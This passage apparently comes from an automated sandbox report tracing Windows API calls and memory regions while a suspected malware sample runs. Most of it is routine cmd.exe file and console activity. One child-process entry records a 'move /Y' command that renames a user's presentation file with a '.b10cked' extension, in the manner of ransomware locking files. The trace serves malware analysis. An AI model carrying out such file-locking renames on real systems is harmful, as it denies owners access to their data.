nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] GetFileType (hFile=0x4c) returned 0x1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.700] GetFileType (hFile=0x4c) returned 0x1 [0234.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.700] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.700] GetFileType (hFile=0x4c) returned 0x1 [0234.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.700] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.701] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.701] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.702] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.702] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.703] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.704] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.704] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x32, lpOverlapped=0x0) returned 1 [0234.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.705] GetFileType (hFile=0x4c) returned 0x1 [0234.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.705] GetFileType (hFile=0x4c) returned 0x1 [0234.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x32, lpOverlapped=0x0) returned 1 [0234.705] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.705] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.705] _close (_FileHandle=4) returned 0 [0234.705] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x14eedc | out: lpFindFileData=0x14eedc) returned 0 [0234.705] GetLastError () returned 0x12 [0234.705] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0234.706] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0234.706] _close (_FileHandle=3) returned 0 [0234.706] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.706] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.706] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.706] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.706] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.706] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.707] SetConsoleInputExeNameW () returned 0x1 [0234.707] GetConsoleOutputCP () returned 0x1b5 [0234.707] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.707] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.707] exit (_Code=0) Process: id = "636" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xc88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35068 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35069 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35070 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35071 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 35072 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35073 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35074 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35075 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35076 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 35077 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35474 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35475 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35476 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35477 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35478 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 35479 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35480 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35481 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35482 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35483 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35484 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35485 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35486 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35487 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35488 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 35489 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35490 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35491 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35492 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35493 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35494 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35495 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 35496 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 35497 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 876 os_tid = 0xc90 [0235.154] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fb5c | out: lpSystemTimeAsFileTime=0x28fb5c*(dwLowDateTime=0xbfa03000, dwHighDateTime=0x1d440a9)) [0235.154] GetCurrentProcessId () returned 0xc88 [0235.154] GetCurrentThreadId () returned 0xc90 [0235.154] GetTickCount () returned 0x40914 [0235.154] QueryPerformanceCounter (in: lpPerformanceCount=0x28fb54 | out: lpPerformanceCount=0x28fb54*=29194344712) returned 1 [0235.155] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.155] __set_app_type (_Type=0x1) [0235.155] __p__fmode () returned 0x76b331f4 [0235.155] __p__commode () returned 0x76b331fc [0235.155] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.156] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.156] GetCurrentThreadId () returned 0xc90 [0235.156] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc90) returned 0x38 [0235.156] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.156] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.156] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.156] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.156] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28faec | out: phkResult=0x28faec*=0x0) returned 0x2 [0235.156] VirtualQuery (in: lpAddress=0x28fb23, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.156] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.156] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.156] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.156] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.156] GetConsoleOutputCP () returned 0x1b5 [0235.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.157] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.157] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.157] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.157] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.157] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.157] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.157] GetEnvironmentStringsW () returned 0x801b0* [0235.158] FreeEnvironmentStringsW (penv=0x801b0) returned 1 [0235.158] GetEnvironmentStringsW () returned 0x801b0* [0235.158] FreeEnvironmentStringsW (penv=0x801b0) returned 1 [0235.158] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ea5c | out: phkResult=0x28ea5c*=0x40) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0xe8, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] 